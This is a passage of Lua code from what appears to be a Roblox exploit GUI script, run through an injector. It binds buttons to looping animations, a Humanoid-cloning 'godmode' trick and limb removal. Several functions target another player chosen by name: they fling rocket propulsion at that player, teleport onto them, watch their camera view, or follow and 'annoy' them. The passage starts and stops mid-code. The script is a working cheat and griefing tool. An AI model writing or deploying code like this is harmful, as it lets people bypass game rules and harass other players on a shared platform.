Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if armsareoff then track:Play(.1, 1, 1e6) end end end else track:Stop() armsoff.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://121572214" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) headfloatACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) headfloatACTIVE = false headfloat.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) headfloat.MouseButton1Click:connect(function() headfloatACTIVE = not headfloatACTIVE if headfloatACTIVE then headfloat.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if headfloatACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() headfloat.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35154961" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local headthrowACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) headthrowACTIVE = false headthrow.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) headthrow.MouseButton1Click:connect(function() headthrowACTIVE = not headthrowACTIVE if headthrowACTIVE then headthrow.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if headthrowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() headthrow.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35154961" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local loopheadACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) loopheadACTIVE = false loophead.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) loophead.MouseButton1Click:connect(function() loopheadACTIVE = not loopheadACTIVE if loopheadACTIVE then loophead.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if loopheadACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() loophead.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local levitateACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) levitateACTIVE = false levitate.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) levitate.MouseButton1Click:connect(function() levitateACTIVE = not levitateACTIVE if levitateACTIVE then levitate.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if levitateACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() levitate.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local crawlACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) crawlACTIVE = false crawl.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) crawl.MouseButton1Click:connect(function() crawlACTIVE = not crawlACTIVE if crawlACTIVE then crawl.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if crawlACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() crawl.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local jumplandACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) jumplandACTIVE = false jumpland.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) jumpland.MouseButton1Click:connect(function() jumplandACTIVE = not jumplandACTIVE if jumplandACTIVE then jumpland.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if jumplandACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() jumpland.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local punchesACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) punchesACTIVE = false punches.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) punches.MouseButton1Click:connect(function() punchesACTIVE = not punchesACTIVE if punchesACTIVE then punches.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if punchesACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() punches.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204062532" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local swingACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) swingACTIVE = false swing.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) swing.MouseButton1Click:connect(function() swingACTIVE = not swingACTIVE if swingACTIVE then swing.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if swingACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() swing.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204295235" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local swordstrikeACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) swordstrikeACTIVE = false swordstrike.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) swordstrike.MouseButton1Click:connect(function() swordstrikeACTIVE = not swordstrikeACTIVE if swordstrikeACTIVE then swordstrike.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if swordstrikeACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() swordstrike.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://45834924" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local happyACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) happyACTIVE = false happy.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) happy.MouseButton1Click:connect(function() happyACTIVE = not happyACTIVE if happyACTIVE then happy.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if happyACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() happy.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33796059" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local insaneACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) insaneACTIVE = false insane.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) insane.MouseButton1Click:connect(function() insaneACTIVE = not insaneACTIVE if insaneACTIVE then insane.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if insaneACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() insane.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429703734" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local movingdanceACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) movingdanceACTIVE = false movingdance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) movingdance.MouseButton1Click:connect(function() movingdanceACTIVE = not movingdanceACTIVE if movingdanceACTIVE then movingdance.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if movingdanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() movingdance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35654637" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local normalACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) normalACTIVE = false normal.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) normal.MouseButton1Click:connect(function() normalACTIVE = not normalACTIVE if normalACTIVE then normal.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if normalACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() normal.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://186934910" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local spindanceACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) spindanceACTIVE = false spindance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) spindance.MouseButton1Click:connect(function() spindanceACTIVE = not spindanceACTIVE if spindanceACTIVE then spindance.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if spindanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() spindance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local CloneIllusionACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) CloneIllusionACTIVE = false CloneIllusion.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end) CloneIllusion.MouseButton1Click:connect(function() CloneIllusionACTIVE = not CloneIllusionACTIVE if CloneIllusionACTIVE then CloneIllusion.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) while wait() do if track.IsPlaying == false then if CloneIllusionACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() CloneIllusion.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end end) spinning = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) spinning = false CoolSpin.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end) CoolSpin.MouseButton1Click:connect(function() spinning = not spinning if spinning then local p = Instance.new("RocketPropulsion") p.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart p.Name = "CrazySpin" p.Target = game:GetService("Players").LocalPlayer.Character["Left Arm"] p:Fire() CoolSpin.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrazySpin:Destroy() CoolSpin.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://180612465" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ScaredACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) ScaredACTIVE = false CrouchRocket.BackgroundColor3 = Color3.new(0.952941, 0.711765, 0.1705882) end) CrouchRocket.MouseButton1Click:connect(function() ScaredACTIVE = not ScaredACTIVE if ScaredACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "CrouchRocket" u.Target = game:GetService("Players").LocalPlayer.Character.Head u:Fire() CrouchRocket.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) while wait() do if track.IsPlaying == false then if ScaredACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() CrouchRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrouchRocket:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local jumprocketnow = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) jumprocketnow = false JumpRocket.BackgroundColor3 = Color3.new(0.952941, 0.711765, 0.1705882) end) JumpRocket.MouseButton1Click:connect(function() jumprocketnow = not jumprocketnow if jumprocketnow then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "JumpRocket" u.Target = game:GetService("Players").LocalPlayer.Character.Head u:Fire() JumpRocket.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) while wait() do if track.IsPlaying == false then if jumprocketnow then track:Play(.1, 1, 1) end end end else track:Stop() JumpRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.JumpRocket:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local RapidPunchACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) RapidPunchACTIVE = false RapidPunch.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) end) RapidPunch.MouseButton1Click:connect(function() RapidPunchACTIVE = not RapidPunchACTIVE if RapidPunchACTIVE then RapidPunch.BackgroundColor3 = Color3.new(0.1962745, 0.827451, 0.721569) while wait() do if track.IsPlaying == false then if RapidPunchACTIVE then track:Play(.1, 1, 10) end end end else track:Stop() RapidPunch.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) end end) FEGodmode.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1 local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = game:GetService("Players").LocalPlayer.Character l.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["1"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" end) NoLimbs.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character["Left Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() end) BrickHats.MouseButton1Click:connect(function() for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if (v:IsA("Accessory")) then v.Handle.Mesh:Destroy() end end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://181525546" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local FaintACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) FaintACTIVE = false Faint.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) Faint.MouseButton1Click:connect(function() FaintACTIVE = not FaintACTIVE if FaintACTIVE then Faint.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if FaintACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Faint.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://188632011" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SpinACTIVE = false Spin.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) Spin.MouseButton1Click:connect(function() SpinACTIVE = not SpinACTIVE if SpinACTIVE then Spin.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if SpinACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() Spin.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33169583" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local ArmFollowACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) ArmFollowACTIVE = false ArmFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) ArmFollow.MouseButton1Click:connect(function() ArmFollowACTIVE = not ArmFollowACTIVE if ArmFollowACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "ArmFollow" u.Target = game:GetService("Players").LocalPlayer.Character["Right Arm"] u:Fire() ArmFollow.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if ArmFollowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() ArmFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.ArmFollow:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local PunchFollowACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) PunchFollowACTIVE = false PunchFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) end) PunchFollow.MouseButton1Click:connect(function() PunchFollowACTIVE = not PunchFollowACTIVE if PunchFollowACTIVE then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "PunchFollow" u.Target = game:GetService("Players").LocalPlayer.Character["Right Arm"] u:Fire() PunchFollow.BackgroundColor3 = Color3.new(0.756863, 0.466667, 0.878431) while wait() do if track.IsPlaying == false then if PunchFollowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() PunchFollow.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.PunchFollow:Destroy() end end) AnimationId = "148840371" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) _18active = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) _18active = false _18.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) _18.MouseButton1Click:connect(function() _18active = not _18active if _18active then _18.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do track:Play() while wait() do if _18active then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end end else track:Stop() _18.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://180612465" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local crouchattacking = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) crouchattacking = false CrouchAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) CrouchAttack.MouseButton1Click:connect(function() crouchattacking = not crouchattacking if crouchattacking then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "CrouchAttack" for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do u.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart end u:Fire() CrouchAttack.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if track.IsPlaying == false then if crouchattacking then track:Play(.1, 1, 1) end end end else track:Stop() CrouchAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CrouchAttack:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SlamPropulsioning = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SlamPropulsioning = false SlamPropulsion.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) SlamPropulsion.MouseButton1Click:connect(function() SlamPropulsioning = not SlamPropulsioning if SlamPropulsioning then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "SlamPropulsion" for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do u.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart end u:Fire() SlamPropulsion.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if track.IsPlaying == false then if SlamPropulsioning then track:Play(.1, 1, 1) end end end else track:Stop() SlamPropulsion.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SlamPropulsion:Destroy() end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429730430" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinAttacking = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) SpinAttacking = false SpinAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) end) SpinAttack.MouseButton1Click:connect(function() SpinAttacking = not SpinAttacking if SpinAttacking then local u = Instance.new("RocketPropulsion") u.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart u.Name = "SpinAttack" for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do u.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart end u:Fire() SpinAttack.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if track.IsPlaying == false then if SpinAttacking then track:Play(.1, 1, 1) end end end else track:Stop() SpinAttack.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.SpinAttack:Destroy() end end) watching = false CreepyWatch.MouseButton1Click:connect(function() watching = not watching end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) walkingthrough = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) walkingthrough = false WalkThrough.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) end) WalkThrough.MouseButton1Click:connect(function() walkingthrough = not walkingthrough if walkingthrough then WalkThrough.BackgroundColor3 = Color3.new(0.352941, 0.882353, 0.576471) while wait() do if walkingthrough then for i,v in pairs(GetPlayer(TXTBOX_PlrNameEXTRA.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame if track.IsPlaying == false then if walkingthrough then track:Play(.1, 1, 1e6) end end end end end else WalkThrough.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) track:Stop() end end) annoying = false Annoy.MouseButton1Click:connect(function() annoying = not annoying end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local crawlACTIVE = false Carpett = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) Carpett = false Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end) Carpet.MouseButton1Click:connect(function() Carpett = not Carpett if Carpett then Carpet.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) while wait() do if track.IsPlaying == false then if Carpett then track:Play(.1, 1, 1) end end end else track:Stop() Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end end) following = false Follow.MouseButton1Click:connect(function() following = not following end) headwalking = false HeadWalk.MouseButton1Click:connect(function() headwalking = not headwalking end) Spammer = false Spam.MouseButton1Click:connect(function() Spammer = not Spammer end) stuck = false Stick.MouseButton1Click:connect(function() stuck = not stuck end) TeleportTo.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) orbital = false Orbit.MouseButton1Click:connect(function() orbital = not orbital if orbital then Orbit.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.Name = "Orbit" for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart o:Fire() game:GetService('RunService').Stepped:connect(function() if orbital then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Orbit:Destroy() Orbit.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end end) currentview = false View.MouseButton1Click:connect(function() currentview = not currentview for i,v in pairs(GetPlayer(TXTBOX_PlrName.Text))do if currentview then game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head View.BackgroundColor3 = Color3.new(0.403922, 0.796078, 0.858824) else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Head View.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) end end end) floating = false Float.MouseButton1Click:connect(function() floating = not floating if floating then Float.BackgroundColor3 = Color3.new(0.707843, 0.54902, 0.813726) local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Float" for i,v in pairs(GetPlayer(TXTBOX_PlrName2.Text))do game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head y.Target = game:GetService("Players")[v.Name].Character.Head y:Fire() game:GetService('RunService').Stepped:connect(function() if floating then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if floating then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Leg"].CFrame end end end else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Float:Destroy() Float.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) flattening = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) flattening = false Flatten.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) end) Flatten.MouseButton1Click:connect(function() flattening = not flattening if flattening then Flatten.BackgroundColor3 = Color3.new(0.707843, 